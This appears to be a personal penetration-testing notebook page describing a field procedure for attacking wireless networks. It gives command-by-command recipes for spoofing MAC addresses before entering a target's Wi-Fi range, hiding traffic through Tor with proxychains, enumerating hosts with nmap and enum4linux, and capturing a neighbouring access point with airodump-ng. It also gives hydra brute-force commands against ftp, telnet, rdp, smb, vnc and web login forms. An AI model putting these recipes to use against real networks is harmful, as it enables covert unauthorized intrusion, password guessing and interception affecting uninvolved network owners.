The Process

These each expand to detail each procedure. This section represents the majority of material in this page.

Be sure to exercise many of the principals from 'The Purple Files' in order to stay on task, record important information, and make the engagement productive.

The basic process is to prepare your machine long before arriving at your blind or run a single command, and for that matter before you power up. Boot up from a removable media copy of Kali Linux, or the Linux of your choice (do not use persistence). Change your MAC. Go to your blind. Start a pcap log of everything running through your network interface and save it to a local file. Walk through your methodology making notes along the way. Include date-time stamps. Consider using a second removable media to save your working papers and the pcap log file.

Principals and Priorities

Stay out of jail! No, really! Stay out of jail!
Do No Harm!
Be ethical! Always!
Think twice about every atomic step.
Log everything you do so you have a detailed transcription of your actions.

MAC setting

Before you begin and while outside of the WiFi range of the target and the blind where from where you plan to work, change your MAC address to something random but plosable. Try to fit into the herd. If the target is amoung a bunch of this or that type of computer, use a MAC within that range.

sudo iwconfig

sudo ifconfig

macchanger -s wlan0

sudo ifconfig wlan0 down

sudo macchanger -A wlan0

sudo ifconfig wlan0 up

sudo ifconfig

sudo ifconfig wlan0 down

sudo macchanger -p wlan0

sudo ifconfig

ifconfig

ifconfig enp2s0 down

ifconfig enp2s0 hw ether 00:00:00:00:00:01

ifconfig enp2s0 up

Prep

sudo tcpdump -i wlan0 -B 8192 -s0 -w Date.pcap

-[Disable internal and enable external USB WiFi]- Normal settings: eno1: 55:26:1b:69:43:2a wlp2s0: c0:fb:da:7A:de:f3 wlan0: 00:c0:b0:8f:2a:07

sudo ifconfig wlan0 down

sudo macchanger -A wlan0

sudo ifconfig wlan0 up

sudo ifconfig wlan0 down

sudo macchanger -A wlan0

sudo ifconfig wlan0 up

sudo ifconfig wlan0

Connect to AP

Once you are in range of the blind

sudo iw dev

sudo iw wlan0 link

sudo iw wlan0 scan

sudo nmcli dev wifi

sudo nmcli -f ALL dev wifi

sudo ifconfig wlan0 up

sudo iwlist wlan0 scan

sudo iwlist wlan0 scan | grep ESSID

sudo dhclient wlan0

sudo iwconfig wlan0 essid network-essid

sudo nmcli connection show

sudo iwconfig wlan0 freq 2.422G

sudo wpa_supplicant -c /etc/wpa_supplicant.conf -i wlan0

sudo systemctl stop NetworkManager

sudo dhclient wlan0

Proxy Chains

sudo -i

sudo apt install tor

service tor start

service tor status

service tor start

service tor status

nano /etc/proxychains4.conf

In proxychains4.conf you want to uncomment 'dynamic_chain' and comment out 'strick_chain' and 'random_chain'.

You also want to uncomment 'Proxy DNS requests - no leak for DNS data' and 'proxy_dns'.

Then in the [ProxyList] section add the following two lines. All other proxys should be commented out.

socks4  127.0.0.1 9050

socks5  127.0.0.1 9050

Restart your machine and start the tor service.

service tor restart

Now you can start hunting. Note that if you start a browser, be sure to close all of its tabs and terminate it before running other command line tools.

proxychains Firefox www.google.com proxychains nmap ... proxychains sqlmap...

You can check your IP to confirm. This is the report from nordvpn.com/what-is-my-ip in Firefox without proxychains.

nordvpn.com/what-is-my-ip

proxychains firefox nordvpn.com/what-is-my-ip

Other site that report your IP include:

https://whatismyipaddress.com/

https://www.whatismyip.com/

https://www.iplocation.net/find-ip-address

https://www.ipvanish.com/what-is-my-ip-address/

You can also check from the command line.

curl https://ipinfo.io/ip

wget -qO- https://ipecho.net/plain ; echo

curl https://ipecho.net/plain

curl ifconfig.me

curl ipv4.icanhazip.com

Now check using proxychains. Restart tor and you get a new path.

proxychains curl https://ipinfo.io/ip

service tor restart

proxychains curl https://ipinfo.io/ip

More on Proxychains


To test

proxychains curl ifconfig.me/ip

If you get something different than your actual IP, then it is workkng.

Try capturing your traffic with tcpdump then analyze with wireshark.

open your web browser with proxcychain command

proxychains firefox

and then go to this webpage

https://www.dnsleaktest.com/

if it shows u different location, it means it is working. u can also click on test button and see more details.

make sure that your dns server also changed

Or,

proxychains firefox www.whatsmyip.org

proxychains firefox www.dnsleaktest.com

proxychains firefox nordvpn.com/what-is-my-ip

proxychains firefox ip.me

proxychains firefox www.whatismypublicip.com

host -4 myip.opendns.com resolver1.opendns.com

proxychains curl ifconfig.me

proxychains curl icanhazip.com

proxychains curl ipecho.net/plain

proxychains curl https://diagnostic.opendns.com/myip

proxychains curl ident.me

proxychains curl ipecho.net/plain

proxychains dig TXT +short o-o.myaddr.l.google.com @ns1.google.com | awk -F'"' '{ print $2}'

Harvest select proxies from the above site and use Libracalc and sublime to create a tmp file that contains the proxies in the proxychain format (protocol ip port) all lower case.

Note how to set the configuration file (/etc/proxychains4.conf)>

proxychains sudo nmap -sT -p 80 HQ.info

proxychains sudo nmap -sT -PO -p 80 HQ.info

proxychains sudo nmap -sT -PO -p 80 thepurplefiles.com

host thepurplefiles.com

sudo nc.traditional -vv -n 162.241.225.36 80

GET / HTTP/1.0

proxychains nmap -sT -p 80 162.241.225.36

proxychains nmap -sT -p 443 162.241.225.36

host HQ.info

Reconnaissance

nmcli dev wifi list

sudo iwlist wlan0 scan

Enumeration

nmap -Pn -A -sS -sV --open --version-all -T4 -p 1-65535 -oN
127.0.0.2.nmap.full.versions.txt 127.0.0.2

enum4linux -S -u "HQStaff" -p "HQ2014" 10.8.16.3

Exploit

Use the following to research known exploits.

searchsploit - Included in our Exploit Database repository on GitLab is searchsploit, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without Internet access.

Many exploits contain links to binary files that are not included in the standard repository but can be found in our Exploit Database Binary Exploits repository instead. If you anticipate you will be without Internet access on an assessment, ensure you check out both repositories for the most complete set of data.

This guide is for version 4 of SearchSploit. Note, The name of this utility is SearchSploit and as its name indicates, it will search for all exploits and shellcode. It will not include any results for Google Hacking Database, but it can include Papers if configured (correctly!).

https://gitlab.com/exploit-database/exploitdb

/usr/share/seclists/
    README.md
    /Discovery
    /IOCs
    /Fuzzing
    /Miscellaneous
    /Passwords
    /Pattern-Matching
    /Payloads
    /Usernames
    /Web-Shells

/usr/share/exploitdb/
    exploits
    files_exploits.csv  
    files_shellcodes.csv  
    /shellcodes

/usr/share/exploitdb-papers/
    /docs  
    files_papers.csv  
    /papers

/usr/share/exploitdb-bin-sploits/
    bin-sploits

metasploit-framework
/home/parth/Hacking/packetstorm.archives
/home/parth/Hacking/wordlists

Ben, flesh out the following...

/usr/share/metasploit-framework

sqlmap

aircrack-ng examples

sudo airmon-ng check

$ sudo airmon-ng check kill

$ iwconfig

sudo airmon-ng start wlan0

iwconfig

sudo airodump-ng wlan0

 CH 11 ][ Elapsed: 3 mins ][ 2021-05-31 17:24

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:52:61:97:05:B0  -32      128       66    0   1  54e  WPA2 CCMP   PSK  ATDFJ7Er3A
 BC:A5:11:99:2E:38  -36      139        0    0   1  54e. WPA2 CCMP   PSK  ATDFJ7Er3A_2GEXT
 DA:31:34:68:77:AF  -42      134       10    0   1  54e  WPA2 CCMP   PSK  DIRECT-roku-619-781E36
 94:8F:CF:75:BE:00  -53      139      118    0   1  54e  WPA2 CCMP   PSK  ATFB2a6B4A
 96:8F:CF:75:BE:02  -54      138        0    0   1  54e  WPA2 CCMP   PSK  <length: 18>
 30:E1:71:B2:B8:66  -70      132        0    0   6  54e  WPA2 CCMP   PSK  DIRECT-65-HP ENVY 4510 series
 B0:EE:7B:AF:1E:E5  -71       89        0    0   6  54e  WPA2 CCMP   PSK  <length: 22>
 1E:49:7B:40:18:AA  -76      133       16    0   6  54e  WPA2 CCMP   PSK  TheFolks
 78:32:1B:6E:8D:D0  -76       32        5    0   2  54e  WPA2 CCMP   PSK  Citizencharlesfosterkane
 1C:49:7B:40:18:A9  -77      138        5    0   6  54e  WPA2 CCMP   PSK  Homestead
 96:8F:CF:1C:94:52  -78       40        0    0   6  54e  WPA2 CCMP   PSK  <length: 18>
 14:91:82:D4:3E:80  -79       12        8    0   1  54e  WPA2 CCMP   PSK  belkin.e80
 2C:99:24:61:7F:D9  -79       79        1    0  11  54e. WPA2 CCMP   PSK  ARRIS-7FDB
 A0:04:60:35:2D:C5  -80      114       11    0   7  54e  WPA2 CCMP   PSK  Serenity
 A2:17:B8:45:0D:63  -76      121       74    0  11  54e  WPA2 CCMP   PSK  <length:  9>
 2C:30:33:E7:45:7D  -82       83      102    3   1  54e  WPA2 CCMP   PSK  belkin.e80_2GEXT
 F4:17:B8:45:0D:62  -75      135       75    0  11  54e  WPA2 CCMP   PSK  ATFB2a6B4A
 94:8F:CF:1C:94:50  -81       41       15    0   6  54e  WPA2 CCMP   PSK  ATTAG2GTA2
 BA:2C:A0:8B:15:63  -82      128        0    0   6  54e  OPN              NewThermostat_8B1563
 14:91:82:D4:3E:83  -80       10        0    0   1  54e  OPN              belkin.e80.guests
 98:F7:81:52:85:65  -81       15        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-57D5
 5A:EF:68:FF:21:E1  -81        8        0    0   5  54e  OPN              Linksys10417-guest
 2C:99:24:2D:4D:B9  -82      115        0    0  11  54e. WPA2 CCMP   PSK  ARRIS-4DBB
 98:F7:81:71:B2:8E  -78        0        1    0   9  54e. WPA2 CCMP   PSK  ARRIS-8261
 44:A5:6E:6E:40:0B  -79        4        0    0   1  54e  WPA2 CCMP   PSK  NETGEAR92
 F4:17:B8:1E:69:1A  -81        9        0    0  11  54e  WPA2 CCMP   PSK  ATTMaSk44I
 AC:3A:7A:0B:C1:1F  -78        4        1    0  11  54e  WPA2 CCMP   PSK  DIRECT-roku-483
 58:EF:68:FF:21:E1  -81        5        0    0   5  54e  WPA2 CCMP   PSK  Linksys10417
 F8:2D:C0:D4:82:50  -81        0        6    0   1  -1   WPA              <length:  0>
 F4:17:B8:1E:6A:3A  -79       46        0    0   1  54e  WPA2 CCMP   PSK  ATTMaSk44I

Select an AP from above and begin monitoring it exclusively.

sudo airodump-ng --bssid 1C:49:7B:40:18:A9 -c 6 -w Homestead.capture.cap wlan0

hydra examples

(ftp, detailed)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -d

(number of tasks - 16 default)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -t 32

(stop when creds found)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -F

(read >= 1 target ips from file)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -M hosts.txt

(null user and pw combinations)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -d -e nsr

(save op to file)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -d -e nsr -o result.txt

(attack a specific port)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 telnet -s 8080 -o result.txt

(restart previous attack)

hydra -R

(gen charset numerals, upper, and lower from 1-8 long)

hydra -L usernames.txt -x 1:8:1aA -o result.txt

Telnet

hydra -L users -P passwords 192.168.56.1 telnet "RT-N56U_3.0.0.4"

# hydra -L usernames.txt -P passwords.txt 192.168.2.62 telnet -V

[DATA] attacking service telnet on port 23 [23][telnet] host: 192.168.56.1
    login: username password: password123 1 of 1 target successfully
    completed, 1 valid password found

rdp

hydra -l admin -p password -t 2 10.8.16.1 rdp

ftp

hydra -L usernames.txt -P passwords.txt 192.168.2.62 ftp -V -f

SMB

hydra -L usernames.txt -P passwords.txt 192.168.2.66 smb -V -f

VNC

hydra -P passwords.txt 192.168.2.62 vnc -V

Web form

Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)]

Target : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
Login username : admin (if you don’t sure, bruteforce this)
Password list : “The location of dictionary file list containing possible passwords.”
Form parameters : “for general, use tamper data or proxy to obtain form of request parameters. But here im using iceweasel, firefox based, network developer toolbar.”
Service module : http-post-form

hydra -l (username) -P (passwords) hostname service-module) (post request parameters)[/code]

l : is a word containing username account, use -L (FILE) to refer list of possible user name in a file.
P (FILE) : is a file list of possible password, use -p (password) to literally use one word password instead of guess it.
testapp.vunlwebapp.com : is a hostname or target
http-post-form : is the service module we use
“/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout” = the 3 parameters needed, the syntax is : {page URL}:{Request post body form parameters}:S={Find whatever in the page after succesfully logged in}
v = Verbose mode
V = show login:pass for each attempt
f = Terminate program if pair login:password is found

Finally, based on information we have gathered, our commands should look something like this:

hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form"/Login.asp?
RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f

hydra Remote-IP-Address http-get-form “/dvwa/vulnerabilities/brute/index.php:
username=^USER^&password=^PASS^&Login=Login:Username and/or password
incorrect.:H=Cookie:security=low; PHPSESSID=fe4d577c1704ed9d87f3cbe3e4c8d4de”
-l admin -P /root/passwords/Passwords -V

What to Focus on

Technical Tasks To Do

. Master ifconfig, iwconfig, iw,
. Work through tutorials and book on WireShark
. Pull images and text from wifi
. Use JTR to crack a WiFi (WEP), Linux login, MS login password hash.
. Perform a MITM attack
. Crack a WiFi password
. Crack an online PW with hydra
. Sending signals (SIGTERM, SIGINT...)
. Setup target and walk through several msf actions (along with other tools).

. Master these tools:
arpwatch - Ethernet Activity Monitor.
bmon - bandwidth monitor and rate estimator.
bwm-ng - live network bandwidth monitor.
curl - transferring data with URLs. (or try httpie)
darkstat - captures network traffic, usage statistics.
dhclient - Dynamic Host Configuration Protocol Client
dig - query DNS servers for information.
dstat - replacement for vmstat, iostat, mpstat, netstat and ifstat.
ethtool - utility for controlling network drivers and hardware.
gated - gateway routing daemon.
host - DNS lookup utility.
hping - TCP/IP packet assembler/analyzer.
ibmonitor - shows bandwidth and total data transferred.
ifstat - report network interfaces bandwidth.
iftop - display bandwidth usage.
ip (PDF file) - a command with more features that ifconfig (net-tools).
iperf3 - network bandwidth measurement tool. (above screenshot Stacklinux VPS)
iproute2 - collection of utilities for controlling TCP/IP.
iptables - take control of network traffic.
IPTraf - An IP Network Monitor.
iputils - set of small useful utilities for Linux networking.
iw - a new nl80211 based CLI configuration utility for wireless devices.
jwhois (whois) - client for the whois service.
lsof -i - reveal information about your network sockets.
mtr - network diagnostic tool.
net-tools - utilities include: arp, hostname, ifconfig, netstat, rarp, route,
plipconfig, slattach, mii-tool, iptunnel and ipmaddr.
ncat - improved re-implementation of the venerable netcat.
netcat - networking utility for reading/writing network connections.
nethogs - a small ‘net top’ tool.
Netperf - Network bandwidth Testing.
netsniff-ng - Swiss army knife for daily Linux network plumbing.
netstat - Print network connections, routing tables, statistics, etc.
netwatch - monitoring Network Connections.
ngrep - grep applied to the network layer.
nload - display network usage.
nmap - network discovery and security auditing.
nmcli - a command-line tool for controlling NetworkManager and reporting network status.
nmtui - provides a text interface to configure networking by controlling NetworkManager.
nslookup - query Internet name servers interactively.
ping - send icmp echo_request to network hosts.
route - show / manipulate the IP routing table.
slurm - network load monitor.
snort - Network Intrusion Detection and Prevention System.
smokeping - keeps track of your network latency.
socat - establishes two bidirectional byte streams and transfers data between them.
speedometer - Measure and display the rate of data across a network.
speedtest-cli - test internet bandwidth using speedtest.net
ss - utility to investigate sockets.
tcpdump - command-line packet analyzer.
tcptrack - Displays information about tcp connections on a network interface.
telnet - user interface to the TELNET protocol.
tracepath - very similar function to traceroute.
traceroute - print the route packets trace to network host.
vnStat - network traffic monitor.
websocat - Connection forwarder from/to web sockets to/from usual sockets, in style of socat.
wget - retrieving files using HTTP, HTTPS, FTP and FTPS.
Wireless Tools for Linux - includes iwconfig, iwlist, iwspy, iwpriv and ifrename.

Housekeeping

Depending on the engagement you will have prepared is several possible ways, so you need to tie each of them up at this point.

Save working material (files, screen shots, whatever) to removable media.
Once beyound the blind, reset the MAC.

sudo ifconfig wlp2s0 down

sudo macchanger -p wlp2s

	The Process βεη (ß¿) βεÏÏαΨÿ
This information is exclusively for my own use. Any violation will be punished to the full extent of my imagination...
βεη